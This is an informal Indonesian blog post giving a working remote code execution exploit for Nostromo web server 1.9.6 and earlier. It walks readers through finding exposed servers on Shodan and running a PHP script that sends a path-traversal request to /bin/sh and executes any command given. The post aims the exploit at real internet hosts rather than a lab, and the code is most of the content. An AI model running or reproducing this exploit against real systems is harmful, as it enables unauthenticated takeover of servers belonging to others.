Nostromo <= 1.9.6 Remote Code Execution



Hello gaes, udah lama nih w gk post hahaha
Kali ini w mw post poc rce bug dari Nostromo
Simak ya :D

1. Go to shodan.io
2. Fill Query: "Server: Nostromo"

3. Click

4. You will open the new tab copy IP:PORT
5. Create a file in your vps/termux/ whatever 
<?php
//Exploit-Kita
//Con7ext
$hos = $argv[1];
$cmd = $argv[2];

$po = explode(":", $hos);
$fp = fsockopen($po[0], $po[1]);

fwrite($fp, "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n");
fwrite($fp, "Content-Length: 1\r\n\r\necho\necho\n{$cmd} 2>&1");

while (!feof($fp)) {
 echo fgets($fp, 1024);
}

?>
6. Now Run The file : php file.php IP:PORT "COMMAND

DOCUMENT_ROOT: /www/htdocs

Ref: https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html?m=1

- Rintod

0 Response to "Nostromo <= 1.9.6 Remote Code Execution"

Post a Comment

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel